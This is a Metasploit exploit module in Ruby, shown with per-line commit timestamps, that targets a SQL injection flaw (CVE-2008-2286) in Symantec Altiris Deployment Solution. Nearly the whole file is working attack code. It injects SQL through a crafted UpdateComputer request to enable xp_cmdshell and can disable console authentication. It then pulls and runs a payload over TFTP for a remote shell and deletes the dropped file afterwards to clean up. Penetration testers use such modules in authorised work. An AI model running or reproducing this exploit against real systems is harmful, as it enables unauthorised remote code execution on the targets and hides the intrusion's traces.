2013-10-18 16:24:50 +00:00
|
|
|
##
|
2013-11-12 03:22:14 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-10-18 16:24:50 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = NormalRanking
|
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
include Msf::Exploit::CmdStagerTFTP
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2013-11-08 14:30:35 +00:00
|
|
|
'Name' => 'Symantec Altiris DS SQL Injection',
|
2013-11-07 23:33:35 +00:00
|
|
|
'Description' => %q{
|
2013-11-08 14:30:35 +00:00
|
|
|
This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
|
|
|
|
to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
|
|
|
|
numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
|
|
|
|
several SQL injections are required in close succession, first to enable xp_cmdshell, then
|
|
|
|
retrieve the payload via TFTP and finally execute it. The module also has the capability
|
|
|
|
to disable or enable local application authentication. In order to work the target system
|
|
|
|
must have a tftp client available.
|
2013-11-07 23:33:35 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Brett Moore', # Vulnerability discovery
|
|
|
|
'3v0lver' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2008-2286' ],
|
|
|
|
[ 'OSVDB', '45313' ],
|
|
|
|
[ 'BID', '29198'],
|
|
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows 2003 (with tftp client available)',
|
|
|
|
{
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win'
|
|
|
|
}
|
|
|
|
]
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'DisclosureDate' => 'May 15 2008',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
2013-10-18 16:24:50 +00:00
|
|
|
[
|
2013-11-07 23:33:35 +00:00
|
|
|
Opt::RPORT(402),
|
2013-11-07 23:53:28 +00:00
|
|
|
OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
|
|
|
|
OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
|
|
|
|
OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
|
2013-11-07 23:33:35 +00:00
|
|
|
], self.class)
|
2013-10-18 16:24:50 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
def execute_command(cmd, opts = {})
|
|
|
|
inject=[]
|
2013-10-18 16:24:50 +00:00
|
|
|
|
2013-11-08 14:30:35 +00:00
|
|
|
if @xp_shell_enable
|
2013-11-07 23:33:35 +00:00
|
|
|
inject+=[
|
|
|
|
"#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
|
|
|
|
"#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
|
|
|
|
]
|
2013-11-07 23:53:28 +00:00
|
|
|
@xp_shell_enable = false
|
2013-11-07 23:33:35 +00:00
|
|
|
end
|
2013-10-18 16:24:50 +00:00
|
|
|
|
2013-11-08 14:30:35 +00:00
|
|
|
if @wc_disable_security
|
|
|
|
inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"]
|
|
|
|
@wc_disable_security = false
|
|
|
|
end
|
|
|
|
|
|
|
|
if @wc_enable_security
|
|
|
|
inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"]
|
|
|
|
@wc_enable_security = false
|
|
|
|
end
|
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
|
2013-10-18 16:24:50 +00:00
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
inject.each do |sqli|
|
|
|
|
send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
|
|
|
|
end
|
2013-10-18 16:24:50 +00:00
|
|
|
end
|
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
def send_update_computer(processor_speed)
|
|
|
|
notification = %Q|Request=UpdateComputer
|
2013-10-18 16:24:50 +00:00
|
|
|
OS-Bit=32
|
|
|
|
CPU-Arch=x86
|
|
|
|
IP-Address=192.168.20.107
|
|
|
|
MAC-Address=005056C000AB
|
|
|
|
Name=Remove_test
|
|
|
|
OS=Windows XP
|
|
|
|
Version=2.6-38 (32-Bit)
|
|
|
|
LoggedIn=Yes
|
|
|
|
Boot-Env=Automation
|
|
|
|
Platform=Linux
|
|
|
|
Agent-Settings=Same
|
|
|
|
Sys-Info-TimeZoneBias=0
|
|
|
|
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
|
2013-11-07 23:33:35 +00:00
|
|
|
Processor-Speed=#{processor_speed}
|
2013-11-07 23:44:22 +00:00
|
|
|
\x00
|
2013-11-07 23:33:35 +00:00
|
|
|
|
|
2013-10-18 16:24:50 +00:00
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
connect
|
|
|
|
sock.put(notification)
|
|
|
|
response = sock.get_once()
|
|
|
|
disconnect
|
2013-10-18 16:24:50 +00:00
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
return response
|
|
|
|
end
|
2013-10-18 16:24:50 +00:00
|
|
|
|
2013-11-07 23:44:22 +00:00
|
|
|
def check
|
|
|
|
res = send_update_computer("2659")
|
|
|
|
|
|
|
|
unless res and res =~ /Result=Success/ and res=~ /DSVersion=(.*)/
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
|
|
|
|
version = $1
|
|
|
|
|
|
|
|
unless version =~ /^6\.(\d+)\.(\d+)$/
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
2014-01-24 18:08:23 +00:00
|
|
|
vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
|
2013-11-07 23:44:22 +00:00
|
|
|
|
|
|
|
minor = $1.to_i
|
|
|
|
build = $2.to_i
|
|
|
|
|
|
|
|
if minor == 8
|
|
|
|
if build == 206 || build == 282 || build == 378
|
2014-01-24 18:08:23 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
2013-11-07 23:44:22 +00:00
|
|
|
elsif build < 390
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
elsif minor == 9 and build < 176
|
|
|
|
#The existence of versions matching this profile is a possibility... none were observed in the wild though
|
|
|
|
#as such, we're basing confidence off of Symantec's vulnerability bulletin.
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2013-11-08 14:30:35 +00:00
|
|
|
@wc_disable_security = datastore['DISABLE_SECURITY']
|
|
|
|
@wc_enable_security = datastore['ENABLE_SECURITY']
|
2013-11-07 23:53:28 +00:00
|
|
|
@xp_shell_enable = datastore['XP_CMDSHELL']
|
2013-11-08 14:30:35 +00:00
|
|
|
|
2013-11-07 23:53:28 +00:00
|
|
|
# CmdStagerVBS was tested here as well, however delivery took roughly
|
|
|
|
# 30 minutes and required sending almost 350 notification messages.
|
|
|
|
# size constraint requirement for SQLi is: linemax => 393
|
|
|
|
execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'})
|
2013-11-07 23:44:22 +00:00
|
|
|
end
|
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
def on_new_session(client)
|
|
|
|
return if not payload_exe
|
2013-11-08 00:11:54 +00:00
|
|
|
|
2013-11-07 23:33:35 +00:00
|
|
|
#can't scrub dropped payload while the process is still active so...
|
2013-11-08 00:11:54 +00:00
|
|
|
#iterate through process list, find our process and the associated
|
|
|
|
#parent process ID, Kill the parent.
|
|
|
|
#This module doesn't use FileDropper because of timing issues when
|
|
|
|
#using migrate -f and FileDropper. On the other hand PrependMigrate
|
|
|
|
#has been avoided because of issues with reverse_https payload
|
|
|
|
#SeeRM#8365 https://http://dev.metasploit.com/redmine/issues/8365
|
|
|
|
|
|
|
|
unless client.type == "meterpreter"
|
|
|
|
print_error("Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
|
|
|
|
# migrate
|
|
|
|
print_status("Migrating ...")
|
2013-11-07 23:33:35 +00:00
|
|
|
client.console.run_single("run migrate -f")
|
2013-11-08 00:11:54 +00:00
|
|
|
# kill the parent process so the payload can hopefully be dropped
|
|
|
|
print_status("Kill parent process ...")
|
2013-11-07 23:33:35 +00:00
|
|
|
client.sys.process.get_processes().each do |proc|
|
|
|
|
if proc['pid'] == client.sys.process.open.pid
|
|
|
|
client.sys.process.kill(proc['ppid'])
|
|
|
|
end
|
2013-10-18 16:24:50 +00:00
|
|
|
end
|
|
|
|
|
2013-11-08 00:11:54 +00:00
|
|
|
win_temp = client.fs.file.expand_path("%TEMP%")
|
|
|
|
win_file = "#{win_temp}\\#{payload_exe}"
|
|
|
|
print_status("Attempting to delete #{win_file} ...")
|
|
|
|
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
|
|
|
client.fs.file.rm(win_file)
|
|
|
|
print_good("Deleted #{win_file}")
|
2013-10-18 16:24:50 +00:00
|
|
|
end
|
2013-11-07 23:33:35 +00:00
|
|
|
|
2013-10-18 16:24:50 +00:00
|
|
|
end
|